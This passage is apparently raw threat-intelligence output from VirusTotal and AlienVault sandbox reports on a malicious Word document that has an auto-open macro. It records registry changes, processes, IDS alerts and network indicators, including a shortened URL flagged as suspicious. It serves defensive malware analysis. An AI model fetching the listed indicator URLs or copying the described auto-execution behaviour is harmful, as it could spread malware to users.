"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\#\\SymbolicLink"
},
{
"value":"0",
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refresh"
},
{
"value":"1",
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed"
},
{
"value":"28 1B 00 00 01 00 00 00 00 00 00 00 10 00 00 00 18 1B 00 00 09 00 00 00 9A 00 00 00 01 00 00 00 01 00 00 00 40 00 00 00 1A 00 00 00 5C 00 5C 00 2E 00 5C 00 72 00 6F 00 6F 00 74 00 5C 00 77 00 6D 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 01 00 00 04 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 64 00 00 00 68 00 00 00 3A 00 00 00 4D 00 53 00 69 00 53 00 43 00 53 00 49 00 5F 00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 6F 00 6E 00 53 00 74 00 61 00 74 00 69 00 73 00 74 00 69 00 63 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 1A 00 00 00 49 00 6E 00 73 00 74 00 61 00 6E 00 63 00 65 00 4E 00 61 00 6D 00 65 00 00 00 2F 20 4D 6F 64 75 6C 65 20 4E 61 6D 65 3A 48 00 00 00 00 00 00 00 02 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 48 00 00 00 1C 00 00 00 42 00 79 00 74 00 65 00 73 00 52 00 65 00 63 00 65 00 69 00 76 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 40 00 00 00 14 00 00 00 42 0",
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Data"
},
{
"value":"LowDateTime:418629328,HighDateTime:30487037***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\System32\\Drivers\\portcls.SYS[PortclsMof]"
},
{
"value":"LowDateTime:-227274444,HighDateTime:30116024***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]"
},
{
"value":"LowDateTime:1137199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]"
},
{
"value":"LowDateTime:1497199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\mssmbios.sys.mui[MofResource]"
},
{
"value":"LowDateTime:302488720,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\advapi32.dll[MofResourceName]"
},
{
"value":"LowDateTime:369951187,HighDateTime:30778805***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\en-US\\advapi32.dll.mui[MofResourceName]"
},
{
"value":"LowDateTime:1237199616,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\ACPI.sys.mui[ACPIMOFResource]"
},
{
"value":"LowDateTime:-377767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]"
},
{
"value":"LowDateTime:382232320,HighDateTime:30016580***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]"
},
{
"value":"LowDateTime:-577767680,HighDateTime:30016579***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]"
},
{
"value":"LowDateTime:803713417,HighDateTime:0***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\IDE\\DiskAMDX_HARDDISK___________________________2.5+____\\5&2770a7af&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}"
},
{
"value":"LowDateTime:-445445610,HighDateTime:30778799***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]"
},
{
"value":"LowDateTime:398767260,HighDateTime:30646967***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\ACPI.sys[ACPIMOFResource]"
},
{
"value":"LowDateTime:-1637837527,HighDateTime:30762899***Binary mof failed, see WMIPROV.LOG",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\monitor.sys[MonitorWMI]"
},
{
"value":"LowDateTime:-649833737,HighDateTime:30733938***Binary mof compiled successfully",
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\DREDGE\\%windir%\\system32\\DRIVERS\\mssmbios.sys[MofResource]"
},
{
"value":"1354301477",
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109110000000000000000F01FEC\\Usage\\WORDFiles"
},
{
"value":"1354301536",
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109110000000000000000F01FEC\\Usage\\ProductFiles"
},
{
"value":"1354301450",
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109E60090400000000000F01FEC\\Usage\\ProductNonBootFilesIntl_1033"
},
{
"value":"01 01 00 00 00 00 00 00 00 00 06 00 00 00",
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Common\\Toolbars\\Settings\\Microsoft Word"
},
{
"value":"12642",
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Counter"
},
{
"value":"12643",
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help"
},
{
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating"
},
{
"value":"SW\\{eeab7790-c514-11d1-b42b-00805fc1270e}\\asyncmac",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{ad498944-762f-11d0-8dcb-00c04fc3358c}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\\DeviceInstance"
},
{
"value":"1",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\DeviceClasses\\{cac88484-7515-4c03-82e6-71a87abac361}\\##?#SW#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{cac88484-7515-4c03-82e6-71a87abac361}\\Control\\ReferenceCount"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\22\\(Default)"
},
{
"value":"00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff00"
},
{
"value":"00 00 00 00 71 00 00 00 19 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff01"
},
{
"value":"01 00 00 00 5A 00 00 00 D6 17 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff02"
},
{
"value":"00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF",
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff03"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ndis.sys[MofResourceName]",
"value":"LowDateTime:-1971493113,HighDateTime:30676308***Binary mof failed, see WMIPROV.LOG"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\portcls.SYS[PortclsMof]",
"value":"LowDateTime:-1221632304,HighDateTime:30487028***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]",
"value":"LowDateTime:-403062016,HighDateTime:30016570***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]",
"value":"LowDateTime:-1867536076,HighDateTime:30116016***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\System32\\Drivers\\en-US\\portcls.SYS.mui[PortclsMof]",
"value":"LowDateTime:-503062016,HighDateTime:30016570***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\advapi32.dll[MofResourceName]",
"value":"LowDateTime:-1337772912,HighDateTime:30778796***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\en-US\\advapi32.dll.mui[MofResourceName]",
"value":"LowDateTime:-1270310445,HighDateTime:30778796***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]",
"value":"LowDateTime:-143062016,HighDateTime:30016570***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]",
"value":"LowDateTime:-2018029312,HighDateTime:30016571***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]",
"value":"LowDateTime:-1258029312,HighDateTime:30016571***Binary mof failed, see WMIPROV.LOG"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\en-US\\intelppm.sys.mui[PROCESSORWMI]",
"value":"LowDateTime:2076937984,HighDateTime:30016571***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\intelppm.sys[PROCESSORWMI]",
"value":"LowDateTime:-2085707242,HighDateTime:30778791***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\ACPI.sys[ACPIMOFResource]",
"value":"LowDateTime:-1241494372,HighDateTime:30646958***Binary mof compiled successfully"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\DRIVERS\\monitor.sys[MonitorWMI]",
"value":"LowDateTime:1016868137,HighDateTime:30762891***Binary mof failed, see WMIPROV.LOG"
},
{
"key":"HKLM\\Software\\Microsoft\\WBEM\\WDM\\%windir%\\system32\\drivers\\mssmbios.sys[MofResource]",
"value":"LowDateTime:2004871927,HighDateTime:30733930***Binary mof compiled successfully"
},
{
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
"value":"26791636"
},
{
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\Data\\Toolbars",
"value":"4C 00 00 00 A3 01 00 00 01 00 00 00 02 01 FF FF BD 00 00 00 00 00 00 00 00 00 10 00 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 01 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 01 02 01 FE 00 00 00 00 00 00 00 00 1E 00 58 00 5C 01 58 00 1B 00 00 00 01 00 E2 71"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\TimeZoneInformation\\ActiveTimeBias",
"value":"4294967176"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG",
"value":"%windir%\\System32\\Bits.log"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK",
"value":"%windir%\\System32\\Bits.bak"
},
{
"key":"HKU\\S-1-5-21-575823232-3065301323-1442773979-1000\\Software\\Microsoft\\Office\\14.0\\Word\\MTTT",
"value":"34 06 00 00 A0 C2 86 8C 98 32 D6 01 00 00 00 00 80 0A 00 00 E0 A7 FF B1 98 32 D6 01 00 00 00 00"
},
{
"key":"HKLM\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Data",
"value":"28 1B 00 00 01 00 00 00 00 00 00 00 10 00 00 00 18 1B 00 00 09 00 00 00 9A 00 00 00 01 00 00 00 01 00 00 00 40 00 00 00 1A 00 00 00 5C 00 5C 00 2E 00 5C 00 72 00 6F 00 6F 00 74 00 5C 00 77 00 6D 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 01 00 00 04 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 64 00 00 00 68 00 00 00 3A 00 00 00 4D 00 53 00 69 00 53 00 43 00 53 00 49 00 5F 00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 6F 00 6E 00 53 00 74 00 61 00 74 00 69 00 73 00 74 00 69 00 63 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 1A 00 00 00 49 00 6E 00 73 00 74 00 61 00 6E 00 63 00 65 00 4E 00 61 00 6D 00 65 00 00 00 2F 20 4D 6F 64 75 6C 65 20 4E 61 6D 65 3A 48 00 00 00 00 00 00 00 02 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 48 00 00 00 1C 00 00 00 42 00 79 00 74 00 65 00 73 00 52 00 65 00 63 00 65 00 69 00 76 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 40 00 00 00 14 00 00 00 42 0 .. truncated"
},
{
"key":"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00004109E60090400000000000F01FEC\\Usage\\ProductNonBootFilesIntl_1033",
"value":"1367932938"
},
{
"key":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS\\StateIndex",
"value":"1"
},
{
"key":"HKLM\\SYSTEM\\ControlSet001\\Control\\Nsi\\{eb004a03-9b1a-11d4-9123-0050047759bc}\\24\\ffffffffffffffffffffffffffffff01",
"value":"00 00 00 00 6D 00 00 00 19 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF"
}
],
"has_pcap":false,
"processes_tree":[
{
"process_id":"2936",
"name":"%windir%\\system32\\wbem\\wmiprvse.exe"
},
{
"process_id":"2900",
"name":"wmiadap.exe /F /T /R"
},
{
"process_id":"2644",
"name":"\"%ProgramFiles(x86)%\\Microsoft Office\\Office14\\WINWORD.EXE\" %SAMPLEPATH%"
},
{
"process_id":"2256",
"name":"%windir%\\System32\\svchost.exe -k WerSvcGroup"
}
],
"analysis_date":1607472788,
"processes_terminated":[
"wmiadap.exe /F /T /R",
"%windir%\\System32\\svchost.exe -k WerSvcGroup"
],
"has_html_report":false,
"registry_keys_deleted":[
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Counter",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Counter",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\First Help",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Last Help",
"HKLM\\SYSTEM\\ControlSet001\\Services\\WmiApRpl\\Performance\\Object List"
],
"behash":"fd7358c7e7f4d2d645756a08e2f519ec",
"last_modification_date":1607584657,
"sandbox_name":"C2AE"
},
"type":"file_behaviour",
"id":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_C2AE",
"links":{
"self":"https://www.virustotal.com/api/v3/file_behaviours/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_C2AE"
}
},
{
"attributes":{
"verdicts":[
"MALWARE"
],
"ip_traffic":[
{
"destination_ip":"224.0.0.22"
},
{
"transport_layer_protocol":"UDP",
"destination_ip":"224.0.0.252",
"destination_port":5355
}
],
"files_written":[
"C:\\Users\\user\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx",
"C:\\Users\\user\\AppData\\Local\\Temp\\~$514e47d2abe363e158aa892fa0dbe4.docx"
],
"modules_loaded":[
"UxTheme",
"OLEAUT32",
"ole32",
"msctf",
"IMM32",
"api-ms-win-downlevel-advapi32-l2-1-0",
"ADVAPI32",
"usp10",
"dwrite",
"SXS",
"MSCTF"
],
"has_pcap":true,
"analysis_date":1607514315,
"sandbox_name":"Yomi Hunter",
"has_html_report":true,
"behash":"30c9e987f1b060915e2d4a531489b650",
"last_modification_date":1607541972,
"ids_alerts":[
{
"rule_category":"Potentially Bad Traffic",
"alert_severity":"medium",
"alert_context":{
"src_ip":"10.10.0.121",
"dest_ip":"224.0.0.22"
},
"rule_msg":"DECODE_IP_OPTION_SET",
"rule_source":"snort",
"rule_id":"444"
},
{
"rule_category":"Attempted Information Leak",
"alert_severity":"medium",
"alert_context":{
"src_ip":"10.10.0.121",
"protocol":"UDP",
"dest_ip":"224.0.0.252",
"src_port":51706,
"dest_port":5355
},
"rule_msg":"PSNG_UDP_PORTSWEEP_FILTERED",
"rule_source":"snort",
"rule_id":"23"
}
],
"processes_created":[
"C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
"C:\\Program Files (x86)\\Microsoft Office\\Office12\\WINWORD.EXE /Automation -Embedding",
"C:\\Windows\\splwow64.exe 12288",
"bin\\is32bit.exe -f C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE",
"bin\\GLIHZOHpN.exe --app C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE --only-start --args C:\\Users\\A4148~1.MON\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx /e --curdir C:\\Users\\A4148~1.MON\\AppData\\Local\\Temp",
"C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE C:\\Users\\A4148~1.MON\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx /e",
"bin\\is32bit.exe -p 1884"
],
"processes_tree":[
{
"process_id":"1884",
"time_offset":24909,
"name":"63ca65483996721f7e5de56cb5036d32.EXE"
}
],
"files_opened":[
"C:\\",
"C:\\Users\\",
"C:\\Users\\user\\",
"C:\\Users\\user\\AppData\\",
"C:\\Users\\user\\AppData\\Local\\",
"C:\\Users\\user\\AppData\\Local\\Temp\\b5514e47d2abe363e158aa892fa0dbe4.docx",
"C:\\Users\\user\\AppData\\Local\\Temp\\~$514e47d2abe363e158aa892fa0dbe4.docx",
"C:\\Windows\\Fonts\\staticcache.dat"
]
},
"type":"file_behaviour",
"id":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_Yomi Hunter",
"links":{
"self":"https://www.virustotal.com/api/v3/file_behaviours/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c_Yomi Hunter"
}
}
],
"links":{
"self":"https://www.virustotal.com/api/v3/files/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c/behaviours?limit=10"
}
}
VirusTotal_v3_comments.py
{
"meta":{
"count":2
},
"data":[
{
"attributes":{
"date":1607511498,
"text":"Joe Sandbox Analysis: \n\t\t\t\nVerdict: MAL\nScore: 48/100\nClassification: mal48.winDOCX@1/3@0/0\n\nHTML Report: https://www.joesandbox.com/analysis/328528/0/html\t\nPDF Report: https://www.joesandbox.com/analysis/328528/0/pdf\nExecutive Report: https://www.joesandbox.com/analysis/328528/0/executive\nIncident Report: https://www.joesandbox.com/analysis/328528/0/irxml\nIOCs: https://www.joesandbox.com/analysis/328528?idtype=analysisid\n\t",
"votes":{
"positive":0,
"abuse":0,
"negative":0
},
"html":"Joe Sandbox Analysis: <br />\t\t\t<br />Verdict: MAL<br />Score: 48/100<br />Classification: mal48.winDOCX@1/3@0/0<br /><br />HTML Report: https://www.joesandbox.com/analysis/328528/0/html\t<br />PDF Report: https://www.joesandbox.com/analysis/328528/0/pdf<br />Executive Report: https://www.joesandbox.com/analysis/328528/0/executive<br />Incident Report: https://www.joesandbox.com/analysis/328528/0/irxml<br />IOCs: https://www.joesandbox.com/analysis/328528?idtype=analysisid<br />\t",
"tags":[
]
},
"type":"comment",
"id":"f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-5904096f",
"links":{
"self":"https://www.virustotal.com/api/v3/comments/f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-5904096f"
}
},
{
"attributes":{
"date":1607471419,
"text":"Extruded layers such as embedded logic (2426 bytes), semantic context (21 bytes) (including OCR: 0 bytes), and metadata (0 bytes) are available for view and pivot on InQuest Labs.\n\nhttps://labs.inquest.net/dfi/hash/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c\n\n\n\n\n[info] Macro with Startup Hook: Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.\n\nInterface with InQuest Labs via API through this Python library/CLI: https://github.com/inquest/python-inquestlabs",
"votes":{
"positive":0,
"abuse":0,
"negative":0
},
"html":"Extruded layers such as embedded logic (2426 bytes), semantic context (21 bytes) (including OCR: 0 bytes), and metadata (0 bytes) are available for view and pivot on InQuest Labs.<br /><br />https://labs.inquest.net/dfi/hash/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c<br /><br />[info] Macro with Startup Hook: Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.<br /><br />Interface with InQuest Labs via API through this Python library/CLI: https://github.com/inquest/python-inquestlabs",
"tags":[
]
},
"type":"comment",
"id":"f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-3fb2315e",
"links":{
"self":"https://www.virustotal.com/api/v3/comments/f-e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c-3fb2315e"
}
}
],
"links":{
"self":"https://www.virustotal.com/api/v3/files/e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c/comments?limit=10"
}
}
AlienVault_analysis.py
{
"analysis":{
"hash":"e8a2b27a55533d19b8c1b6d5af8f7988bfad771b9debb9a6c1903625a457065c",
"metadata":{
"tlp":"WHITE"
},
"plugins":{
"avast":{
"results":{
"detection":"Other:Malware-gen\\ [Trj]",
"alerts":[
"Malware infection"
]
}
},
"clamav":{
"results":{
}
},
"metaextract":{
"results":{
}
},
"msdefender":{
"results":{
"detection":"TEL:AGGR:SuspiciousCasingAutoOpen",
"alerts":[
"Malware infection"
]
}
},
"ratdecoder":{
"results":null
},
"yarad":{
"results":{
"detection":[
]
}
},
"cuckoo":{
"result":{
"info":{
"duration":87,
"score":3.2
},
"signatures":[
{
"families":[
],
"description":"HTTP traffic contains suspicious features which may be indicative of malware related traffic",
"severity":2,
"ttp":{
},
"markcount":3,
"references":[
],
"marks":[
{
"suspicious_features":"POST method with no referer header",
"type":"generic",
"suspicious_request":"POST https://nexus.officeapps.live.com/nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d"
},
{
"suspicious_features":"POST method with no referer header",
"type":"generic",
"suspicious_request":"POST https://nexus.officeapps.live.com/nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d"
},
{
"suspicious_features":"POST method with no referer header",
"type":"generic",
"suspicious_request":"POST https://nexus.officeapps.live.com/nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d"
}
],
"name":"network_cnc_http"
},
{
"families":[
],
"description":"Performs some HTTP requests",
"severity":2,
"ttp":{
},
"markcount":14,
"references":[
],
"marks":[
{
"category":"request",
"ioc":"GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTlMusCQK2hbCidwnVINVIaWKpcFQQUGKka%2FLJFScFvMDQIK9mHnLAlV3oCEA5ASQxVMtLx%2F7bSyRc4Qqo%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEGfe9D7xe9riT%2FWUBgbSwIQ%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://ocsp.comodoca4.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQAU7Bfe6xSRj1%2Bo83zCN%2BY2wTgIAQU1LD0%2FU%2BcQqRs3D0u7ltBGMmtA%2FYCEQCGAJT1BA7oz3fngde5x7hq",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.4266&crev=3",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4266.1001&ClientId=%7b54C7745C-E82A-4B14-AF84-02BBDE98E04D%7d&",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"GET https://tinyurl.com/y54lptvl",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d",
"type":"ioc",
"description":null
}
],
"name":"network_http"
},
{
"families":[
],
"description":"Sends data using the HTTP POST Method",
"severity":2,
"ttp":{
},
"markcount":3,
"references":[
],
"marks":[
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7b20E311A8-411A-4C4D-A632-7744661495A1%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bDAB34A62-E36C-4388-9234-517A78D7E0BA%7d",
"type":"ioc",
"description":null
},
{
"category":"request",
"ioc":"POST https://nexus.officeapps.live.com/nexus/upload/%7bEB8A3342-F3D2-4728-96D4-488F6220D276%7d",
"type":"ioc",
"description":null
}
],
"name":"network_http_post"
},
{
"families":[
],
"description":"Allocates read-write-execute memory (usually to unpack itself)",
"severity":2,
"ttp":{
},
"markcount":23,
"references":[
],
